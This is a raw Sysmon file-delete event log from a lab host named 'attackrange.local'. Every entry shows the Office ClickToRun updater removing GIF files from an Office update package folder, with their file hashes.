23542300x800000000000000068294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR46B.GIFMD5=1DDE314BE046497DF0069B9826683248,SHA256=155B0EF130152ED7397573BB99C9D9BC539D8A9A8BDDAF0816F5F0D726F676CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR45F.GIFMD5=A04E1EA7E69820315C8E037DDCFF3385,SHA256=66C5CAB1C182C61FFA9621900B72E5DEB0B28D1DEFD5434BB338B1642B11AAE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR45B.GIFMD5=EDB3EBD11F274FE2416A2CF0AD6DA376,SHA256=AB9B2045023C0C8708B13259E5FAA96613731C9DBFED83AB34CFF96318BB20E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR44F.GIFMD5=EF5EE185C312394D8B75F359FB548EF7,SHA256=A8195D35D5E3AA75804112AB91A101535D5AF27686C9D6907CC066A5B354FA72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR44B.GIFMD5=B8D2FF7B3653ABAA8BB696721FA207D5,SHA256=8E7844363A003CACB25C47DE6402065758383D6E08C6F6429A837B498C77BDB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR43F.GIFMD5=577D82A9304EE01D88F2795026208A70,SHA256=9C297061A56CCF6EE57727D7B201DFF03B68624355CAD8602C85439A17E1FB07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR43B.GIFMD5=569D56AA7A86C9639FADAA057AD464CA,SHA256=D222D36FE9D20BE1176847F48BE15DCEA3E62F3219715103F79C169F165784DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR42F.GIFMD5=776856C5865A4A55907B9E2C3125547D,SHA256=42B1A09613CE0C247780B1BC59AB0F9266DABC9A437C02448DCAA583284578A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR41F.GIFMD5=3A067A00BD89D38E63CA896C7E4C44F7,SHA256=8F4C156C000C8CAF38B3B8C455B9526AAAA12EDF268501952B24DE5173BB9A3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR40F.GIFMD5=9F887ED097C92EDBD2B67F536A99CEF4,SHA256=CAD4D1CB287CB763EDA27403AB7B85A79A0A45CB942D2B6C79919BA13963C43C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR3F.GIFMD5=5930532EEC57BAD95C4DDCA3858C4945,SHA256=6939A4FF6DD366EF1BC8CA5134DA3D5B999BEA675698CF751CED11E88D3F52DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR3B.GIFMD5=5D92725C18C1FC2867D062A374F91069,SHA256=0BE1631CDDDA4AE4A8029EB4F446A23687E18E584FA69AE79D504B2BA4951E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR39F.GIFMD5=AFF2AAFBF875469E91ABECD3F8D9118B,SHA256=2C929F9F5628028C525085F979AAECD96E4FA992304526D163AF2CF66A2D324C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR38F.GIFMD5=D7CBAD9E7F145C299255E1F2A34B4E6A,SHA256=0EA3FBF6ED58CCC3AE1A8218C74381C01C8424115C94B341C20384C84402309A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR37F.GIFMD5=90D13072DD9CA64B3F6E2DCE307B5034,SHA256=2FFAB56CA79F0FF1661B33CC83C50F27E11C35E4094CC43E53B42B5E37C684E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR36F.GIFMD5=732D903AB49B32A0F69284A6810E2ECA,SHA256=E9363A7CAF235EDBB529F5AC89687764879B041E24105964BA0366D06E00132A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR35F.GIFMD5=94A767495F3E888320452258EAFA61EA,SHA256=22AB67C8A1DB704C3F61F93FC3151E9982FB5238F49C333ACA2C74670C12A61F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR34F.GIFMD5=246DF5EB8187373F985EA1831D60DC5E,SHA256=D159DD7A6F74402A51225B2E02B6163D4C054315D86799C79005E38A4CE58B53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR33F.GIFMD5=F1C8835E2506156952DF22ECA18A374C,SHA256=CB34DFE77E6FF03AA5CB13FA1B2BD723A357C06D0F89C86AFB40E4FBEE84479A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR32F.GIFMD5=3F14246123471010B62048AC85D87F98,SHA256=35EDBF5D3D7232EBD0E3C19D7F98ED54F90F823E3CC0FB56DC663E3508CCE9A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR31F.GIFMD5=B44B25837BEB5D1CE68C6F8F1F8DF3D6,SHA256=7DF05362415FE0ED5B71FA8AD01846F4FDDC6808787DB7555D7E41FC3EA885AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR30F.GIFMD5=AC82CE08DBEB38BA8FAA3C1282CEE5FF,SHA256=88A6F406F1D137C86DF3AC470B6BDCEEBFBE3F3766B1A46F207EDA1C5B35E4C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR2F.GIFMD5=4567B85641B1DAC5E84F55A4A4992A35,SHA256=160BF54E0832A493ED75E3D2429E82CED691537F0F76893EA80E1C893568927B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR2B.GIFMD5=141D29A00D3AB8BA171DA89ACD34381F,SHA256=00899DC108A62A571A5AB1ABF64125D37A5DFD1931228A89C260600B12689FC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR29F.GIFMD5=E113204A420A6CA09888FFEFF038A3B1,SHA256=B391650D307B9418E6B9BE26E6EFD3B3717100198C1F284282B16E138FE933DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR28F.GIFMD5=DD52F8EA06423E3276C47B39A42ACFAA,SHA256=2A8A3440502B74A919A3955059E040174C57034B1A7BB3B6C7BBC60F658C6B5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR27F.GIFMD5=A043187410CAD1D0601A8AABAF26A79F,SHA256=74BA9B09C20324C164A951F5496FD1A1838046A9101BFEEF4E238E11C3011FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR26F.GIFMD5=4E90B36DEEF1A04F5896553674F61D85,SHA256=D4519921B1D1C7AADBCD96042DC6A1041C31D35521E23F5463EA0797F911BA47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR25F.GIFMD5=E9F4CA42D6A1EADA4171E14A45392584,SHA256=0708242C13733693C7E23B3DE4DF3081F87D0EF7E99E74362E14BAF6A8FB7BF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR24F.GIFMD5=E110B9EEC18EC364F8578BDA925B886F,SHA256=CAED592EFE610D5FA8B034EE075113C6DEBD82364DCE2B766B057F1BD3958466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR23F.GIFMD5=18E615ABDC93BB7349A2C3A2854574B6,SHA256=BF84CE86E1585D9483EA925C48897A2BA106C8EEF8B17592B7C7E47348DF73C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR22F.GIFMD5=7AADBEB741B84809BE061D88529ECB8B,SHA256=19ADBFE67D6A8FC16A7899ECEEF14456670D19B2A2AFC8FAF1F30C719C108B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR21F.GIFMD5=D3ECF13823590AB168B59DBC2611150E,SHA256=39CF247A48611A2CBAAF6C1A2527D5B90AA91C7BB39576E9339AC8FFBBF99E81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR20F.GIFMD5=44B96137651E7DA5928AA30CA380ACF7,SHA256=FE9CAFEDC2F9D880BE1B5442AE408B8A78EA0ECE2BACE1688022DD59A0D2A070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR1F.GIFMD5=9A665E6EA1B7FB01B08EEEFBD911C729,SHA256=B101BB216F206ADDC0159C823F69DAD59165ED34C67AD45817A52DC3603E4BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR1B.GIFMD5=D26CA1D81B9337322D064295A92B9B7A,SHA256=72555D0672F90EA7225276F3B76DCB33154F4A4DD868FDF0DF288722ECE27019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR19F.GIFMD5=739EA25A4B1D53044870188A2C9245F7,SHA256=A6D5A5B498CD48D7A6E99427A51407FD9FA5CCA0DE894E9912F9908425F5E0DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR18F.GIFMD5=C5E6E4BEF2378DE36E11DD04EDB70DF8,SHA256=99F3E00180FE65BDC6A6AB7A7C227079092B39CA0F9CAB616B106F3AAE99DE75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR17F.GIFMD5=80BA66A9FFD260087C2E9CFEBB41595C,SHA256=C8459BC8E70E4676BBE0879647423EF8420E5F266C1F441452A3B18B8350D1CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR16F.GIFMD5=917ADBA960D6B08A53C935C380F765F0,SHA256=CBE3D934546FD8FD2A3B8DECF2D84FF59A5F8A021CFDA1D3D787727EA7F490F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR15F.GIFMD5=434DEEC853D80A868FF87B7188E550DF,SHA256=9FE592173704BBFC6B1F042085AFC45E1A3D6727430CEA80517AA531F8A420F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR14F.GIFMD5=049E398772F1DC81D1D23D674C12E251,SHA256=8DF3B5191CCE76A25734C061F374DEBDC35017ED1FE16B3E6CBA08248ADC7B90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR13F.GIFMD5=13A073DC2DE13C5AFB7491A700CA8157,SHA256=679AA4303A55EEE0FF83B9174C98ED68699D095E10B89B7AFA7382F0A1FF512B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR12F.GIFMD5=E3BABA3F12A9F9675529479C8FBF4F60,SHA256=757F73C973DC9F6316571B79B1F8918D648330E346C04C34C323CD79C030FBF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 